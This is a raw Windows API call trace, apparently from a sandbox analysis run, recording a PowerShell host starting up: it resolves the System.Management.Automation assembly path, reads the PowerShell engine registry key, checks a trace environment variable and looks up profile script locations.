	[0623.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0624.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0624.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0624.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0624.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0624.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0624.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0624.197] VirtualQuery (in: lpAddress=0x28bbb0, lpBuffer=0x28ca70, dwLength=0x30 | out: lpBuffer=0x28ca70*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0624.202] CoTaskMemAlloc (cb=0x104) returned 0x49d140
	[0624.202] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d140, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0624.202] CoTaskMemFree (pv=0x49d140) 
	[0624.298] CoTaskMemAlloc (cb=0x104) returned 0x49d140
	[0624.298] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d140, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0624.298] CoTaskMemFree (pv=0x49d140) 
	[0625.257] CoTaskMemAlloc (cb=0x104) returned 0x49d140
	[0625.257] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d140, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0625.257] CoTaskMemFree (pv=0x49d140) 
	[0625.260] CoTaskMemAlloc (cb=0x104) returned 0x49d140
	[0625.260] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d140, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0625.261] CoTaskMemFree (pv=0x49d140) 
	[0625.267] CoTaskMemAlloc (cb=0x104) returned 0x49d140
	[0625.267] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d140, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0625.267] CoTaskMemFree (pv=0x49d140) 
	[0625.276] CoTaskMemAlloc (cb=0x104) returned 0x49d140
	[0625.276] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d140, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0625.276] CoTaskMemFree (pv=0x49d140) 
	[0625.278] CoTaskMemAlloc (cb=0x104) returned 0x49d140
	[0625.278] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d140, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0625.278] CoTaskMemFree (pv=0x49d140) 
	[0625.284] VirtualQuery (in: lpAddress=0x28bbb0, lpBuffer=0x28ca70, dwLength=0x30 | out: lpBuffer=0x28ca70*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0628.771] VirtualQuery (in: lpAddress=0x28bbb0, lpBuffer=0x28ca70, dwLength=0x30 | out: lpBuffer=0x28ca70*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0628.777] CoTaskMemAlloc (cb=0x104) returned 0x49d140
	[0628.777] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d140, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0628.777] CoTaskMemFree (pv=0x49d140) 
	[0632.541] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x49d250
	[0632.543] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x49d360
	[0649.593] CoTaskMemAlloc (cb=0x104) returned 0x49d470
	[0649.593] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d470, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0649.593] CoTaskMemFree (pv=0x49d470) 
	[0649.596] CoTaskMemAlloc (cb=0x104) returned 0x49d470
	[0649.596] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d470, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0649.596] CoTaskMemFree (pv=0x49d470) 
	[0651.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0651.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0651.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0651.312] VirtualQuery (in: lpAddress=0x28be60, lpBuffer=0x28cd20, dwLength=0x30 | out: lpBuffer=0x28cd20*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0652.801] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28dcb8 | out: phkResult=0x28dcb8*=0x3a0) returned 0x0
	[0652.801] RegQueryValueExW (in: hKey=0x3a0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28dc3c, lpData=0x0, lpcbData=0x28dc38*=0x0 | out: lpType=0x28dc3c*=0x1, lpData=0x0, lpcbData=0x28dc38*=0x56) returned 0x0
	[0652.801] CoTaskMemAlloc (cb=0x5a) returned 0x1b8edbd0
	[0652.801] RegQueryValueExW (in: hKey=0x3a0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28dc0c, lpData=0x1b8edbd0, lpcbData=0x28dc08*=0x56 | out: lpType=0x28dc0c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28dc08*=0x56) returned 0x0
	[0652.802] CoTaskMemFree (pv=0x1b8edbd0) 
	[0652.802] RegCloseKey (hKey=0x3a0) returned 0x0
	[0652.802] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28dcb8 | out: phkResult=0x28dcb8*=0x3a0) returned 0x0
	[0652.802] RegQueryValueExW (in: hKey=0x3a0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28dc3c, lpData=0x0, lpcbData=0x28dc38*=0x0 | out: lpType=0x28dc3c*=0x1, lpData=0x0, lpcbData=0x28dc38*=0x56) returned 0x0
	[0652.802] CoTaskMemAlloc (cb=0x5a) returned 0x1b8edbd0
	[0652.802] RegQueryValueExW (in: hKey=0x3a0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28dc0c, lpData=0x1b8edbd0, lpcbData=0x28dc08*=0x56 | out: lpType=0x28dc0c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28dc08*=0x56) returned 0x0
	[0652.802] CoTaskMemFree (pv=0x1b8edbd0) 
	[0652.802] RegCloseKey (hKey=0x3a0) returned 0x0
	[0652.813] CoTaskMemAlloc (cb=0x20c) returned 0x1b8d9b00
	[0652.813] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b8d9b00 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0652.814] CoTaskMemFree (pv=0x1b8d9b00) 
	[0652.814] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x28d870, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0652.814] CoTaskMemAlloc (cb=0x20c) returned 0x1b8d9b00
	[0652.814] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b8d9b00 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0652.815] CoTaskMemFree (pv=0x1b8d9b00) 
	[0652.815] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x28d870, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0652.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x28da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0652.815] SetErrorMode (uMode=0x1) returned 0x1
	[0652.816] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x28dc20 | out: lpFileInformation=0x28dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0652.816] SetErrorMode (uMode=0x1) returned 0x1
	[0652.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x28da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0652.816] SetErrorMode (uMode=0x1) returned 0x1
	[0653.031] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x28dc20 | out: lpFileInformation=0x28dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0653.031] SetErrorMode (uMode=0x1) returned 0x1
	[0653.031] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x28da10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0653.032] SetErrorMode (uMode=0x1) returned 0x1
